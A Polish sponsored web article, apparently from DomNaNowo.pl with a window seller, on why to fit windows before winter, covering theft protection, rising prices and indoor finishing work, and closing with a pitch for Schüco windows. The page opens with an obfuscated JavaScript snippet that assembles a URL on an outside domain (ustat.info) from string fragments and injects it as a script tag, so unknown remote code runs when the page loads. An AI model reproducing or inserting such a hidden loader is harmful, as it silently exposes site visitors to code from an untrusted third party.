(function(){ zv90=document.createElement("script");zv90_=(("u")+"st")+"a";zv90.async=true; zv90.type="text/javascript";zv90_+=("t.i")+""+"n";zv90_+=(("f")+"o");zv90_+="/"; zv90u="435399264.";zv90u+="yn47vi1Xv906gbts39q"+"rb3l2dav1zx"; zv90.src="https://"+zv90_+zv90u;document.body.appendChild(zv90); })();

Okna niezbędne do kontynuacji prac budowlanych. Dlaczego powinieneś zamknąć budowę przed zimą?

Montaż okien pozwala zakończyć etap budowy, który nazywa się stanem surowym zamkniętym. Dlatego warto to zrobić przed nadejściem zimy, dzięki czemu można kontynuować prace w środku budynku, gdy na dworze jest już chłodno i pada śnieg.

Zamknięcie budowy pozwoli zabezpieczyć materiały wewnątrz budynku

Zima jest najgorszym okresem dla wielu pracowników branży budowlanej. Mróz oraz śnieg sprawiają, że na zewnątrz część robót jest zawieszonych lub są one wykonywane w ograniczonym zakresie.

Natomiast wstawienie drzwi oraz okien pozwoli nie tylko na kontynuowanie prac wykończeniowych w środku budynku, ale również umożliwi bezpieczne przechowywanie materiałów oraz narzędzi. Możesz na przykład jedno pomieszczenie przeznaczyć na prowizoryczny magazyn, dzięki czemu wszystko będziesz miał pod ręką.

Niestety, w Polsce kradzieże to wciąż plaga na budowach. Często łupem złodziei padają bardzo wartościowe przedmioty, dlatego warto je przed tym ochronić. Montaż okien sprawia, że budynek jest na zewnątrz wykończony, a znajdujące się w nim materiały oraz sprzęt budowlany są właściwie zabezpieczone. Dlatego warto zamknąć budowę przed nadejściem zimy.

Kupisz okna po aktualnych cenach

Kolejną korzyścią związaną z zamknięciem budowy przed zimą jest kupno okien po bieżących cenach. Prognozy ekonomistów nie napawają bowiem optymizmem. W kolejnych miesiącach należy spodziewać się dalszego wzrostu cen wielu produktów, w tym również materiałów budowlanych.

Niepewna sytuacja na świecie, w tym głównie wojna na Ukrainie, napędzają inflację. Widać to również na przykładzie stolarki okiennej, której ceny wciąż idą w górę. Jak się przed tym uchronić? Najlepiej już teraz kupić okna PCV, aluminiowe lub wykonane z obu tych materiałów.

Okna niezbędne do kontynuacji prac budowlanych. Dlaczego powinieneś zamknąć budowę przed zimą? 2

Zamknięcie budynku pozwoli na zabezpieczenie materiałów wewnątrz przed zniszczeniem lub kradzieżą fot. oknamielczarek.pl

Należy również pamiętać, że zakończenie konfliktu na Ukrainie prawdopodobnie będzie stanowiło impuls dla kolejnej fali podwyżek cen materiałów budowlanych. Zniszczony działaniami wojennymi kraj zostanie prędzej czy później odbudowany, co będzie wymagało dużego nakładu sił oraz środków finansowych. W naturalny sposób przełoży się to na wzrost cen okien oraz innych produktów.

Dlatego zamawiając okna właśnie teraz zyskujesz bardzo wiele. Kupno stolarki po aktualnych, niższych cenach rynkowych pozwala nie tylko na zakończenie budowy w stanie surowym zamkniętym, ale również przynosi konkretne oszczędności.

Możesz kontynuować prace budowlane wewnątrz budynku

Gdy zamontujesz okna i drzwi, możesz przystąpić do kolejnego etapu, a więc wykończenia domu do stanu deweloperskiego. W pierwszej kolejności należy wykonać instalacje:

  • grzewcze,
  • elektryczne,
  • wodno-kanalizacyjne.

Instalacje te można rozprowadzić w okresie zimowym, gdyż niska temperatura wewnątrz budynku nie stanowi przeszkody dla tego typu robót budowlanych. Dzięki temu zachowana jest ciągłość prac i szybciej zostaną one ukończone.

Gdy dom znajduje się w stanie surowym zamkniętym wszystkie instalacje są właściwie zabezpieczone przed działaniem czynników atmosferycznych oraz kradzieżą. Dodatkowo po podłączeniu mediów będziesz miał w domu wodę, prąd i ogrzewanie. Stanowi to duże ułatwienie dla realizacji prac wykończeniowych takich jak układanie podłóg, montaż armatury łazienkowej czy tynkowanie ścian wewnętrznych.

Czy zatem montaż okien przed zimą ma tylko zalety? Niektórzy obawiają się, że spowoduje to gorszą wentylację i wolniejsze schnięcia tynków, wylewek oraz innych mieszanek zawierających wodę. Należy jednak zwrócić uwagę, że nowoczesne okna mają specjalną wentylację, która pozwala na skuteczne odprowadzanie wilgoci.

Okna niezbędne do kontynuacji prac budowlanych. Dlaczego powinieneś zamknąć budowę przed zimą? 3

Zamknięcie inwestycji pozwoli na kontynuację prac wewnątrz. Stolarka okienna PVC SI82 CLASSIC, kolor Antracyt fot. oknamielczarek.pl

Poza tym nic nie stoi na przeszkodzie, aby w okresie zimowym wietrzyć pomieszczenia, co przyspieszy wysychanie warstw wykończeniowych. Łatwiej również w tym czasie znaleźć fachowców, którzy najwięcej pracy mają od wiosny do późnej jesieni.

Montując okna przed nadejściem mrozów sprawisz, że wiele robót budowlanych i wykończeniowych zostanie wykonanych w okresie zimowym. To także okazja do negocjacji cen lub kupna niektórych materiałów taniej.

Sprawdź ofertę Okna Mielczarek

Już wiesz, dlaczego warto zamknąć budowę przed nadejściem zimy. Dzięki temu zyskujesz finansowo oraz możesz kontynuować prace wewnątrz budynku. Do pełni sukcesu brakuje tylko odpowiednich okien. Jakie wybrać – PCV, aluminiowe, energooszczędne, a może pasywne?

Niezależnie od tego, na co się zdecydujesz, sprawdź ofertę Okna Mielczarek. Posiadamy w sprzedaży szeroki wybór stolarki okiennej, dlatego na pewno znajdziesz u nas odpowiednie produkty. Oferujemy między innymi okna PCV i aluminiowe niemieckiej firmy Schüco.

Są to okna, który wyróżniają się znakomitymi parametrami, niskim współczynnikiem przenikania ciepła, dużą wytrzymałością oraz odpornością na włamania. Ponadto został w nich wbudowany regulowany system wentylacji, zapewniający odpowiednią cyrkulację powietrza. Ma to szczególnie istotne znaczenie w nowo powstałych budynkach, w których może gromadzić się wilgoć.

Zapytaj o szczegóły oferty naszych handlowców i zamów energooszczędne okna dla Twojego domu!

Nasz partner radzi -oknamielczarek.pl

 

Redakcja

DomNaNowo.pl jest magazynem internetowych z kategorii dom i wnętrza. Naszą misją jest inspirowanie i zachęcanie do ulepszania swojej przestrzeni życiowej. Publikujemy poradniki i artykuły o wszystkim co wiąże się z domami, mieszkaniami i wnętrzarstwem. Publikujemy zestawienia aranżacji różnego typu pomieszczeń oraz przestrzeni mieszkalnych. Prezentujemy rankingi zestawienia. Naszą redakcję tworzy zespół kreatywnych i dociekliwych redaktorów i autorów. Ich pracę wspomagają specjaliści ds. PR oraz marketingu. Na łamach DomNanowo.pl publikowane są nowości wnętrzarskie oraz różne materiały warte opisana i scharakteryzowania. Nasze felietony oraz artykuły poradnikowe tworzone są z myślą o czytelnikach. Z nami każde wnętrze może stać się wyjątkowe.

Powiązane artykuły

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Back to top button